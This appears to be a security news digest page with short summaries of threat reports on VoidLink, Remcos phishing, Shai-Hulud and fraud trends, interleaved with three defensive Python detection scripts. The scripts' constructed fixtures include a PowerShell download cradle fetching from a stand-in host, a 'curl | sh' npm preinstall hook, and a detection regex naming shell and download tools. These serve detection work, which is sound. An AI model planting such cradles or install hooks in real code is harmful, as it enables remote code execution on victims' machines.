ciso brief

All news in category “Threat and Trends Reports”


VoidLink: Advanced Modular Malware for Linux Cloud

🛡️ Researchers at Check Point disclosed VoidLink, a sophisticated modular malware framework targeting Linux servers and containers in cloud environments. Written primarily in Zig with supporting components in Go, C, and JavaScript, the platform pairs a two-stage loader with an extensible plugin ecosystem (37 built-in modules) managed from a professional web-based C2 dashboard; the modules harvest credentials and reach into source-code systems. It detects major cloud providers and container runtimes, adapts its evasion strategy to whatever EDR and kernel hardening it finds, and uses rootkits and covert C2 channels to maintain stealthy, long-term access.

New Remcos Phishing Campaign Uses CVE-2017-11882 RTF

🛡️ FortiGuard Labs uncovered a phishing campaign that delivers a fileless Remcos RAT through a malicious Word document that loads a remote RTF exploiting CVE-2017-11882 (the Equation Editor memory-corruption flaw). The exploit runs shellcode that fetches a VBScript, which in turn launches a Base64-encoded PowerShell loader. That PowerShell downloads an image carrying an embedded .NET module; the loader runs the module in memory to set up persistence and inject the Remcos payload into a legitimate process by process hollowing.
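As an added worked example (not code from the FortiGuard report), the Python below runs a small process-lineage check over constructed Sysmon-style process-creation events and flags each link of the chain described above. It assumes that CVE-2017-11882 is reached through Equation Editor (EQNEDT32.EXE), that the VBScript stage runs under wscript.exe or cscript.exe, and that the loader is passed to powershell.exe as an -EncodedCommand argument; the event records, PIDs, file paths and URL are all constructed for the demo.

```python
"""Added example: lineage rules for the Remcos chain over constructed events.

Not code from the FortiGuard report. Assumptions:
  * CVE-2017-11882 is reached through Equation Editor (EQNEDT32.EXE),
    so Word spawning it is the first visible step.
  * The VBScript stage runs under wscript.exe/cscript.exe and launches
    powershell.exe with a Base64 (UTF-16LE) -EncodedCommand argument.
  * Events are simplified Sysmon-style records built inline below.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
CRADLE_TOKENS = ("downloaddata", "downloadstring", "webclient",
                 "invoke-webrequest", "invoke-expression", "frombase64string")
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell_command(script: str) -> str:
    """Base64 of the UTF-16LE script, the form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def image_name(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Constructed sample: one Word session running the malicious chain, plus a
# benign PowerShell the user launched from Explorer (must not be flagged).
STAGE3 = ("$w=New-Object Net.WebClient;"
          "$b=$w.DownloadData('http://example.invalid/logo.png');"
          "[Reflection.Assembly]::Load($b[1024..($b.Length-1)])")
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 10, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "invoice.docx"'},
    {"pid": 11, "ppid": 10, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"pid": 12, "ppid": 11, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\update.vbs"},
    {"pid": 13, "ppid": 12, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell_command(STAGE3)},
    {"pid": 21, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Tools\backup.ps1"},
]


def ancestors(pid, by_pid):
    """Process records from pid upward (pid itself first); stops on unknown or loop."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (rule, pid) findings for the Remcos-style chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        child = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = image_name(parent["image"]) if parent else ""
        if parent_img in OFFICE_APPS and child == "eqnedt32.exe":
            findings.append(("office_spawns_equation_editor", e["pid"]))
        if child == "powershell.exe":
            decoded = decode_encoded_command(e["cmdline"])
            if decoded is not None:
                if parent_img in SCRIPT_HOSTS:
                    findings.append(("script_host_spawns_encoded_powershell", e["pid"]))
                if any(tok in decoded.lower() for tok in CRADLE_TOKENS):
                    findings.append(("encoded_download_cradle", e["pid"]))
            # Walk the whole ancestry: the Office parent is several hops up.
            lineage = {image_name(a["image"]) for a in ancestors(e["ppid"], by_pid)}
            if lineage & OFFICE_APPS:
                findings.append(("powershell_descends_from_office", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
    print(decode_encoded_command(SAMPLE_EVENTS[4]["cmdline"]))
```

The four rules map directly onto the Image, ParentImage and CommandLine fields of Sysmon Event ID 1; decoding the -EncodedCommand argument is what lets an analyst read the download cradle from telemetry without executing anything.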

64% of Third-Party Apps Access Sensitive Data in 2026

🔒 New 2026 analysis of 4,700 leading websites finds 64% of third-party applications access sensitive data without demonstrable business justification, rising from 51% in 2024. The report identifies recurring causes such as over-permissioned scripts, shadow deployments via tag managers, and persistent trackers. Specific tools flagged include Google Tag Manager, Shopify apps, and the Facebook Pixel, while government and education sites show marked increases in compromise. The study cautions that governance gaps and limited mitigation adoption leave organizations exposed.

Impersonation Drives Crypto Fraud to Record $17bn in 2025

🪙 Chainalysis reports cryptocurrency-related fraud reached at least $14bn in 2025 and expects the total to rise to $17bn as more illicit wallets are identified. Impersonation scams surged in volume by 1,400% YoY and payment values jumped, while AI-linked operations now extract substantially higher revenues. The report warns of industrialized, Asia-linked networks using layered laundering to convert crypto into real-world assets and urges combined prevention and law enforcement responses.

Cybercrime Inc.: Organized Hackers Outpacing IT Defense

🔒 Cybercrime has evolved into a structured, global underground economy that mirrors legitimate corporations, with departments, KPIs, and scalable supply chains. Models like ransomware-as-a-service let nontechnical actors license malware, buy access, and outsource extortion, while payments and sales are managed via closed forums and cryptocurrencies. The result is an efficient, agile adversary that exploits human error, leverages AI for social engineering, and gains a persistent speed advantage over often bureaucratic defenders.

VoidLink: Advanced Linux Malware Framework Targets Cloud

🔍 A newly identified cloud-native Linux malware framework named VoidLink targets modern cloud and container environments, providing custom loaders, implants, rootkits, and memory-loaded plugins. According to Check Point, it is written in Zig, Go, and C and adapts its behavior based on Kubernetes, Docker, and cloud metadata queries. Communications can run over HTTP, WebSocket, DNS tunneling, or ICMP, wrapped in a custom encrypted layer called VoidStream, and the framework includes extensive anti-forensics and runtime protections. Analysts assess that it is under active development and may be a commercial or customer-specific framework rather than evidence of a current widespread campaign.

World Economic Forum: AI, Geopolitics and Rising Cyber Risk

🔍 The World Economic Forum’s Global Cybersecurity Outlook warns cybersecurity risk will accelerate in 2026, driven primarily by advances in AI, deepening geopolitical fragmentation and supply‑chain complexity. Based on survey responses from 804 leaders (including 316 CISOs) across 92 countries, the report finds eroding confidence in national preparedness and divergent priorities between CEOs and CISOs. It highlights both the risk and defensive potential of AI and calls for strengthening collective cyber resilience through collaboration, governance and balanced adoption with robust safeguards.

Latin America Sees Sharpest Rise in Cyber Attacks - Dec 2025

📈 In December 2025 organizations experienced an average of 2,027 cyber attacks per organization per week, reflecting a 1% month-over-month and 9% year-over-year increase. Latin America recorded the steepest rise, with 3,065 attacks per week on average, a 26% year-over-year jump. Check Point attributes sharper regional and sector-level spikes primarily to accelerating ransomware operations and growing exposure tied to enterprise adoption of generative AI. The findings signal heightened risk even as overall growth appears moderate.

VoidLink: Cloud-Native Linux Malware Framework Unveiled

🛡️ Check Point Research describes VoidLink, a cloud-native Linux malware framework built to maintain long-term, stealthy access to cloud infrastructure rather than targeting individual endpoints. Its modular, plug-in-driven design enables attackers to extend capabilities over time while remaining quiet. Adaptive stealth allows the framework to alter behavior based on defensive visibility, prioritizing evasion in monitored environments and speed where visibility is limited.

VoidLink: Advanced Linux Cloud-Native Malware Framework

🛡️ Check Point Research disclosed a previously undocumented Linux malware framework named VoidLink, designed for long-term stealthy access to cloud and container environments. The cloud-native toolkit is highly modular, written in Zig, and comprises custom loaders, implants, rootkits, and an in-memory plugin system with more than 30 modules. It supports diverse C2 channels (HTTP/HTTPS, WebSocket, ICMP, DNS), peer-to-peer mesh networking, and automated cloud discovery across AWS, GCP, Azure, Alibaba, and Tencent. Check Point assesses the framework as actively maintained and attributes it to China-affiliated actors, warning of significant credential-theft and supply-chain risks for cloud-native ecosystems.
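Several of the VoidLink summaries on this page list DNS tunneling among its C2 channels. As an added example (not Check Point's code, and not tied to any published VoidLink indicator), the Python below profiles constructed DNS query logs per (client, registered domain) and flags the combination that tunneling produces: many unique subdomains, long leftmost labels and high label entropy. The thresholds, the sample queries and the naive two-label registered-domain split are assumptions; a real deployment would use a public-suffix list. The sample includes a CDN with many short unique hostnames to show why a unique-count-only rule is not enough.

```python
"""Added example: DNS-tunnel heuristic over constructed query logs.

Not Check Point's code and not tied to any published VoidLink indicator.
Assumptions: thresholds below are illustrative; the registered domain is
taken naively as the last two labels (a real tool would use a public-suffix list).
"""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(text: str) -> float:
    """Bits per character of the string (0 for empty or single-symbol input)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain labels, registered domain) using a naive 2-label split."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])


def profile(queries):
    """Aggregate per (client, registered domain): unique names, label lengths, entropy."""
    stats = defaultdict(lambda: {"names": set(), "longest": [], "entropy": []})
    for src, qname in queries:
        sub, domain = split_name(qname)
        st = stats[(src, domain)]
        st["names"].add(qname.lower())
        st["longest"].append(max((len(label) for label in sub), default=0))
        st["entropy"].append(shannon_entropy("".join(sub)))
    return stats


def flag_tunnels(queries, min_unique=20, min_label=25, min_entropy=3.0):
    """Flag (client, domain) pairs whose subdomains look like encoded data."""
    hits = []
    for (src, domain), st in profile(queries).items():
        unique = len(st["names"])
        avg_len = sum(st["longest"]) / len(st["longest"])
        avg_ent = sum(st["entropy"]) / len(st["entropy"])
        # All three must hold: a CDN has many unique names but short, low-entropy labels.
        if unique >= min_unique and avg_len >= min_label and avg_ent >= min_entropy:
            hits.append({"src": src, "domain": domain, "unique": unique,
                         "avg_label_len": round(avg_len, 1),
                         "avg_entropy": round(avg_ent, 2)})
    return hits


def _encoded_chunk(i: int) -> str:
    """Deterministic stand-in for a hex-encoded data chunk (constructed)."""
    return hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]


# Constructed log: ordinary browsing, a CDN with many short unique hosts, and
# one client pushing 30 encoded chunks through a single domain.
SAMPLE_QUERIES = (
    [("10.0.3.7", n) for n in ("www.example.com", "www.example.com",
                               "api.example.com", "mail.example.com")]
    + [("10.0.3.7", f"img{i}.cdn-static.example") for i in range(30)]
    + [("10.0.3.9", f"{_encoded_chunk(i)}.t.c2-updates.example") for i in range(30)]
)

if __name__ == "__main__":
    for hit in flag_tunnels(SAMPLE_QUERIES):
        print(hit)
```

On real resolver logs the same three measures should be computed per time window, and ICMP-carried C2 (also listed for VoidLink) needs a separate check on echo-request payload size and rate, since it never touches DNS.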

Old Playbook, New Scale: Attackers Optimize the Basics

🔐 Attackers in 2025 are not inventing wholly new techniques but refining long-standing ones (supply-chain compromise, credential theft, and malware in official app stores) at vastly greater scale. AI has lowered the barrier to entry: small teams or individuals can publish packages that earn trust and later pivot them to malicious behavior, and can automate phishing at volume. Gaps in permission models and slow supply-chain mitigation let these campaigns cascade through dependencies. Defenders should prioritize fundamentals: fix permissions, harden verification, and make phishing-resistant authentication the default.

Application Security: Posture, Provenance and Proof

🔒 Application security is shifting from reliance on scanners alone (SAST, DAST, SCA and MAST) to a model organized around posture, provenance and proof. The article recommends Application Security Posture Management (ASPM) as the control plane that correlates scanner output, enforces policy and prioritizes findings by reachability and exposure. It urges stronger supply-chain controls, namely SLSA attestations, signed SBOMs and VEX, plus runtime protections such as IAST and RASP, with AI and language policies driven by recent NIST and NSA/CISA guidance.

When Your Personal Data Appears on the Dark Web - What to Do

🔒 If you learn your personal or financial data is on the dark web, act quickly: cybercriminals use stolen PII, credentials, session cookies and payment details to commit account takeover, identity theft and fraud. Immediately change compromised passwords, enable MFA (prefer authenticator apps or hardware keys), sign out of all devices, scan for infostealer malware and contact your bank to freeze or reissue cards. For longer-term protection, freeze credit, tighten privacy settings, use email aliasing and a password manager, and enroll in monitoring services such as HaveIBeenPwned.

Facebook Login Thieves Adopt Browser-in-Browser Trick

🔐 Over the past six months, threat actors have increasingly used the Browser-in-the-Browser (BitB) technique to harvest Facebook credentials, according to Trellix. The attacks render realistic fake login pop-ups built from iframes inside the page, and often use URL shorteners and reputable cloud hosts such as Netlify and Vercel to evade detection. Campaigns impersonate law firms, copyright notices, and Meta security alerts, adding counterfeit CAPTCHA pages for legitimacy. To reduce risk, avoid embedded links, enable two-factor authentication, and try to drag a login pop-up beyond the edge of the browser window: a genuine pop-up is a separate window and moves freely, while a BitB fake is drawn inside the page and cannot leave it.

Active Worms in Software Supply Chains: Shai-Hulud Threat

🐛 Shai-Hulud marks a shift from passive supply-chain tricks to an actively propagating worm that targets developer identities and CI/CD trust. Variants harvest npm tokens and GitHub secrets, then use the stolen credentials to publish infected packages automatically, often with a dead-man switch that erases traces. CISOs must treat pipelines and AI-assisted tooling as primary attack surfaces.
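One concrete check a CISO's team can run today, as an added example (not from the Shai-Hulud write-up): a scanner that walks a node_modules tree and lists every package with an npm lifecycle hook (preinstall, install, postinstall, prepare, prepublishOnly), marking those whose command fetches or executes something. It assumes the published Shai-Hulud analyses are right that the worm ran from a postinstall hook; the package names, versions and commands in the constructed tree are invented for the demo.

```python
"""Added example: list npm lifecycle hooks in a node_modules tree.

Not code from the Shai-Hulud analyses. Assumes (as those analyses report)
that the worm's payload ran from a postinstall hook, so hooks are the place
to look. The tree built by build_sample_tree() is constructed for the demo.
"""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublishOnly")
# Commands that fetch or execute arbitrary content deserve a closer look first.
RISKY = re.compile(r"\b(curl|wget|bash|sh -c|powershell|base64|eval)\b|node\s+\S+\.js",
                   re.IGNORECASE)


def scan_node_modules(root):
    """Return one finding per lifecycle hook found under root, riskiest first."""
    root = Path(root)
    findings = []
    for manifest in root.rglob("package.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not JSON: skip it rather than abort the scan
        scripts = data.get("scripts")
        if not isinstance(scripts, dict):
            continue
        for hook in LIFECYCLE:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            findings.append({
                "package": data.get("name", manifest.parent.name),
                "version": data.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "risky": bool(RISKY.search(cmd)),
                "path": str(manifest.parent.relative_to(root)),
            })
    return sorted(findings, key=lambda f: (not f["risky"], f["package"]))


def build_sample_tree(root):
    """Write a constructed node_modules tree (invented package names) under root."""
    samples = {
        "acme-logger": {"name": "acme-logger", "version": "1.2.0",
                        "scripts": {"test": "mocha"}},
        "acme-native-addon": {"name": "acme-native-addon", "version": "3.0.1",
                              "scripts": {"install": "node-gyp rebuild"}},
        "acme-colors": {"name": "acme-colors", "version": "4.1.7",
                        "scripts": {"postinstall": "node bundle.js"}},
        "acme-colors/node_modules/acme-telemetry": {
            "name": "acme-telemetry", "version": "0.9.3",
            "scripts": {"preinstall": "curl -s http://example.invalid/setup.sh | sh"}},
    }
    for rel, manifest in samples.items():
        pkg_dir = Path(root) / "node_modules" / rel
        pkg_dir.mkdir(parents=True, exist_ok=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest, indent=2), encoding="utf-8")


def demo():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_node_modules(Path(tmp) / "node_modules")


if __name__ == "__main__":
    for f in demo():
        flag = "RISKY " if f["risky"] else "      "
        print(f"{flag}{f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

Running installs with `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) stops hooks from executing at all; the scan then tells you which packages genuinely need a build step, such as the native addon above, so they can be allowed deliberately rather than by default.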

Phishing and Fraud Surpass Ransomware as Top Risk Globally

🔒 Phishing and broader cyber-enabled fraud have overtaken ransomware as the primary concern for business leaders, according to the World Economic Forum’s Global Cybersecurity Outlook for 2026. The WEF report, produced with Accenture and released on 12 January ahead of Davos, found 77% of surveyed executives reported increases in fraud and phishing, with 62% aware of phishing incidents in their networks. The report also highlights accelerating AI-driven vulnerabilities: 87% reported rising AI-related risks and 94% expect AI to shape cybersecurity in 2026.

Weekly Recap: Automation, Exploits, and Rapid Escalation

🔐 This week's recap highlights how small oversights and automation conveniences have become widespread attack vectors, enabling rapid, large-scale compromise. Key incidents include a maximum-severity RCE in n8n (Ni8mare, CVE-2026-21858) affecting self-hosted instances, the 2M-device Kimwolf Android botnet, and malicious Chrome extensions that exfiltrated AI conversations. The report catalogs numerous trending CVEs and active campaigns, emphasizing that familiar tools and exposed services are the biggest risks today.

Illicit Crypto Activity Hits Record $158bn in 2025

📈 TRM Labs estimates illicit crypto wallets received $158bn in 2025, a 145% increase on 2024, while Chainalysis published a comparable $154bn figure. TRM attributes the surge to increased sanctions evasion (notably by Russia, Iran and Venezuela), improved identification via the Beacon Network, and a handful of large-scale hacks. The firm cautions that methodology changes and ongoing investigations mean these numbers are a dynamic baseline rather than fixed totals. Measured as a share of on-chain flows, illicit activity actually declined to 1.5% in 2025.

Service Providers Fueling Pig Butchering Scam Ecosystem

🔍 Cybersecurity researchers have identified service providers that supply tools, infrastructure, and turnkey platforms to scale pig butchering operations across Southeast Asia, a model the researchers call pig-butchering-as-a-service (PBaaS). Vendors such as Penguin Account Store and UWORK offer stolen identities, pre-registered accounts, SIMs, CRM panels, mobile apps, and payment processors, enabling mass victimization and rapid fund movement. These offerings dramatically lower technical barriers and empower fraud operations tied to human-trafficking-enabled scam compounds.

CISOs' Top Cybersecurity Priorities and AI Focus for 2026

🔐 In 2026 CISOs are balancing core security tasks with urgent AI-related challenges. Strengthening data protection, securing cloud and enterprise AI deployments, and improving identity and access management rank high. Leaders are preparing for AI-enabled attacks, rolling out AI to accelerate security operations, and addressing shadow AI and third-party risks to bolster resilience and supply-chain security.